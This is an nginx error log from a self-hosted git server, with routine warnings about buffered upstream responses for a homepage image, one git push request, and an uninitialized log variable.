2026/02/17 19:51:42 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/93/0000015932 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html"
2026/02/17 19:52:53 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/93/0000015933 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html"
2026/02/17 19:52:59 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/93/0000015934 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html"
2026/02/18 03:30:53 [warn] 941#941: *93643 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr
2026/02/18 14:28:20 [warn] 961#961: *100638 a client request body is buffered to a temporary file /tmp/nginx/body/9/07/0000019079, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr"
2026/02/18 20:55:11 [warn] 973#973: *100954 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr